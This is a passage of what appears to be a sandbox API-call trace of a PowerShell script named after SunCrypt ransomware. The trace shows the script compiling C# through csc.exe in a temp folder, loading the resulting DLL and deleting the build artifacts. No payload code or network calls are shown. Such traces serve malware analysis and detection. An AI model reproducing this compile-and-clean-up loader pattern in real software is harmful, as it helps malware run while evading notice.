Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x14, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x30), Sacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x30, Sbz2=0x0), Dacl=0x30*(AclRevision=0x30, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x1c)), SecurityDescriptorSize=0x0) returned 1 [0091.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", cchWideChar=47, lpMultiByteStr=0x4ebec68, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", lpUsedDefaultChar=0x0) returned 47 [0091.105] CreateDirectoryA (lpPathName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj"), lpSecurityAttributes=0x4ebec5c) returned 1 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0091.107] LocalReAlloc (hMem=0x4265bc8, uBytes=0x72, uFlags=0x2) returned 0x4265bc8 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", nBufferLength=0x39, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", lpFilePart=0x0) returned 0x38 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", nBufferLength=0x39, lpBuffer=0x4265bc8, 
lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", lpFilePart=0x0) returned 0x38 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0091.107] LocalReAlloc (hMem=0x4265bc8, uBytes=0x7a, uFlags=0x2) returned 0x4265bc8 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", lpFilePart=0x0) returned 0x3c [0091.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebec5c) returned 1 [0091.108] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x504 [0091.108] GetFileType (hFile=0x504) returned 0x1 [0091.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebec58) returned 1 [0091.108] GetFileType (hFile=0x504) returned 0x1 [0091.108] CloseHandle (hObject=0x504) returned 1 [0091.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0091.110] LocalReAlloc (hMem=0x4265bc8, uBytes=0x7c, uFlags=0x2) returned 0x4265bc8 [0091.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", nBufferLength=0x3e, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", lpFilePart=0x0) returned 0x3d [0091.110] SetThreadErrorMode 
(dwNewMode=0x1, lpOldMode=0x4ebeca8) returned 1 [0091.110] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.0.cs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x504 [0091.110] GetFileType (hFile=0x504) returned 0x1 [0091.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeca4) returned 1 [0091.111] GetFileType (hFile=0x504) returned 0x1 [0091.111] WriteFile (in: hFile=0x504, lpBuffer=0x6466d7c*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x4ebed14, lpOverlapped=0x0 | out: lpBuffer=0x6466d7c*, lpNumberOfBytesWritten=0x4ebed14*=0x1d4, lpOverlapped=0x0) returned 1 [0091.113] CloseHandle (hObject=0x504) returned 1 [0091.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0091.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", lpFilePart=0x0) returned 0x3c [0091.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebec58) returned 1 [0091.117] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x504 [0091.117] GetFileType (hFile=0x504) returned 0x1 [0091.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebec54) returned 1 [0091.117] GetFileType (hFile=0x504) returned 0x1 [0091.117] 
CloseHandle (hObject=0x504) returned 1 [0091.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0091.123] LocalReAlloc (hMem=0x4265bc8, uBytes=0x82, uFlags=0x2) returned 0x4265bc8 [0091.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", nBufferLength=0x41, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", lpFilePart=0x0) returned 0x40 [0091.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebec20) returned 1 [0091.124] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.cmdline"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x504 [0091.124] GetFileType (hFile=0x504) returned 0x1 [0091.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebec1c) returned 1 [0091.124] GetFileType (hFile=0x504) returned 0x1 [0091.125] WriteFile (in: hFile=0x504, lpBuffer=0x646a6e8*, nNumberOfBytesToWrite=0x17b, lpNumberOfBytesWritten=0x4ebec8c, lpOverlapped=0x0 | out: lpBuffer=0x646a6e8*, lpNumberOfBytesWritten=0x4ebec8c*=0x17b, lpOverlapped=0x0) returned 1 [0091.127] CloseHandle (hObject=0x504) returned 1 [0091.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2f [0091.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x2f, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e 
[0091.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0091.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", nBufferLength=0x36, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", lpFilePart=0x0) returned 0x35 [0091.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe9fc) returned 1 [0091.130] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\csc.exe"), fInfoLevelId=0x0, lpFileInformation=0x4ebecc0 | out: lpFileInformation=0x4ebecc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23456500, ftCreationTime.dwHighDateTime=0x1d4e503, ftLastAccessTime.dwLowDateTime=0xb68ed4f0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x23456500, ftLastWriteTime.dwHighDateTime=0x1d4e503, nFileSizeHigh=0x0, nFileSizeLow=0x20aa88)) returned 1 [0091.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe9f8) returned 1 [0091.131] LocalReAlloc (hMem=0x4265bc8, uBytes=0x208, uFlags=0x2) returned 0x4265bc8 [0091.131] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4265bc8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0091.132] GetCurrentProcess () returned 0xffffffff [0091.132] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebec34 | out: TokenHandle=0x4ebec34*=0x504) returned 1 [0091.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0091.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", nBufferLength=0x3d, 
lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", lpFilePart=0x0) returned 0x3c [0091.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeacc) returned 1 [0091.135] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.out"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x646c2b0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x50c [0091.139] GetFileType (hFile=0x50c) returned 0x1 [0091.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeac8) returned 1 [0091.139] GetFileType (hFile=0x50c) returned 0x1 [0091.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0091.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", lpFilePart=0x0) returned 0x3c [0091.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeacc) returned 1 [0091.139] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.err"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x646c364, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x510 [0091.171] GetFileType (hFile=0x510) returned 0x1 [0091.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeac8) returned 1 [0091.171] GetFileType (hFile=0x510) returned 0x1 [0091.172] WriteFile (in: hFile=0x50c, lpBuffer=0x646dbf0*, nNumberOfBytesToWrite=0x1ce, 
lpNumberOfBytesWritten=0x4ebeb44, lpOverlapped=0x0 | out: lpBuffer=0x646dbf0*, lpNumberOfBytesWritten=0x4ebeb44*=0x1ce, lpOverlapped=0x0) returned 1 [0091.176] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0091.176] GetEnvironmentStringsW () returned 0x4279c60* [0091.178] FreeEnvironmentStringsW (penv=0x4279c60) returned 1 [0091.182] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x64734b4, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x4ebe9ac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x50c, hStdError=0x510), lpProcessInformation=0x646c38c | out: lpCommandLine="\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline\"", lpProcessInformation=0x646c38c*(hProcess=0x518, hThread=0x514, dwProcessId=0x94, dwThreadId=0x884)) returned 1 [0091.261] CloseHandle (hObject=0x50c) returned 1 [0091.262] CloseHandle (hObject=0x510) returned 1 [0091.263] GetCurrentProcess () returned 0xffffffff [0091.263] GetCurrentProcess () returned 0xffffffff [0091.263] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x4ebeb68, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x4ebeb68*=0x510) returned 1 [0091.264] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x927c0, cHandles=0x1, pHandles=0x4ebeb60*=0x510, lpdwindex=0x4ebe984 | out: lpdwindex=0x4ebe984) returned 0x0 [0097.469] CloseHandle 
(hObject=0x510) returned 1 [0097.469] GetExitCodeProcess (in: hProcess=0x518, lpExitCode=0x4ebec70 | out: lpExitCode=0x4ebec70*=0x0) returned 1 [0097.469] CloseHandle (hObject=0x518) returned 1 [0097.469] CloseHandle (hObject=0x514) returned 1 [0097.469] CloseHandle (hObject=0x504) returned 1 [0097.470] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.470] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", lpFilePart=0x0) returned 0x3c [0097.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebec08) returned 1 [0097.470] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x504 [0097.471] GetFileType (hFile=0x504) returned 0x1 [0097.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebec04) returned 1 [0097.471] GetFileType (hFile=0x504) returned 0x1 [0097.471] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x4ebed04 | out: lpFileSizeHigh=0x4ebed04*=0x0) returned 0xe00 [0097.471] ReadFile (in: hFile=0x504, lpBuffer=0x6474bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebecb0, lpOverlapped=0x0 | out: lpBuffer=0x6474bb0*, lpNumberOfBytesRead=0x4ebecb0*=0xe00, lpOverlapped=0x0) returned 1 [0097.472] CloseHandle (hObject=0x504) returned 1 [0097.472] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, 
lpFilePart=0x0) returned 0x3d [0097.472] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", lpFilePart=0x0) returned 0x3c [0097.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebea34) returned 1 [0097.472] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.pdb"), fInfoLevelId=0x0, lpFileInformation=0x4ebecf8 | out: lpFileInformation=0x4ebecf8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0097.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebea30) returned 1 [0097.481] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe00, lpName=0x0) returned 0x504 [0097.482] CloseHandle (hObject=0x504) returned 1 [0097.528] CloseHandle (hObject=0x500) returned 1 [0097.528] GetCurrentProcess () returned 0xffffffff [0097.528] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebed2c | out: TokenHandle=0x4ebed2c*=0x500) returned 1 [0097.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0097.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", nBufferLength=0x41, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", 
lpFilePart=0x0) returned 0x40 [0097.529] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.cmdline")) returned 1 [0097.531] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.531] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", lpFilePart=0x0) returned 0x3c [0097.531] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.out")) returned 1 [0097.533] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.533] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", lpFilePart=0x0) returned 0x3c [0097.534] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.dll")) returned 1 [0097.535] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.535] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", nBufferLength=0x3d, 
lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", lpFilePart=0x0) returned 0x3c [0097.535] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.pdb")) returned 0 [0097.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", lpFilePart=0x0) returned 0x3c [0097.536] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.err")) returned 1 [0097.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", lpFilePart=0x0) returned 0x3c [0097.536] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.tmp")) returned 1 [0097.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0097.537] GetFullPathNameW 
(in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", nBufferLength=0x3e, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", lpFilePart=0x0) returned 0x3d [0097.537] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.0.cs")) returned 1 [0097.539] CloseHandle (hObject=0x500) returned 1 [0097.545] EtwEventActivityIdControl () returned 0x0 [0097.550] ReportEventW (hEventLog=0x3b50004, wType=0x4, wCategory=0x8, dwEventID=0x320, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x647a344*="Add-Type -TypeDefinition @'\r\n", lpRawData=0x647a26c) returned 1 [0097.599] EtwEventWriteTransfer () returned 0x0 [0097.599] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2f6a9f8d, Data2=0x2657, Data3=0x485e, Data4=([0]=0x83, [1]=0xc4, [2]=0x8e, [3]=0xf2, [4]=0x73, [5]=0x83, [6]=0x71, [7]=0xaa))) returned 0x0 [0097.600] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.601] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.601] CoTaskMemFree (pv=0x4272d90) [0097.602] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701041816803) returned 1 [0097.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.602] GetFullPathNameW (in: 